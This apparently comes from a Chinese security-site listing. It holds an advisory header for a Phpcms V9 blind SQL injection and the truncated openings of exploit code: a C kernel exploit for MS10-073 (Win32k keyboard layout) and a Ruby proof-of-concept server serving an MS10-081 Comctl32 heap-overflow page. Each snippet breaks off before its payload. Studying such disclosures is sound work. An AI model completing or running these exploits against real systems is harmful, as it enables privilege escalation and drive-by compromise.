Phpcms V9 网站管理系统 SQL 盲注入漏洞

================================================================= Phpcms V9 BLind SQL Injection Vulnerability 非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了…… ================================================================= Software: Phpcms V9 Vendor: www.Phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.Phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Google Dork:     http://www.exploit-db.com/ghdb/3676/    //check here ^_^ References:     http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html =================================================================

Exp - MS10-073 Win32k Keyboard Layout

MS10-073: Win32k Keyboard Layout Vulnerability Code: // My koala is staring at you  C&ordm;g&ordm;D // Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1     #include <windows.h> #include <stdio.h> #include <ntsecapi.h>     #define MAGIC_OFFSET 0x6261   #define InitializeUnicodeStr(p,s) {     \      (p)->Length= wcslen(s)*2;           \      (p)->MaximumLength = wcslen(s)*2+2; \      (p)->Buffer = s;                \      }     _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx (    IN HANDLE Handle,    IN DWORD offTable,

MS10-081 网马 - Windows Comctl32 溢出

MS10-081: Windows Common Control Library (Comctl32) Heap Overflow,MS10-081 网马: #!/usr/bin/env ruby   # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={})     defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}     opts = defaults.merge(opts)         code = opts[:code]     message = opts[:message]     type = opts[:type]         date_str = Time.now.gmtime.strftime("%a,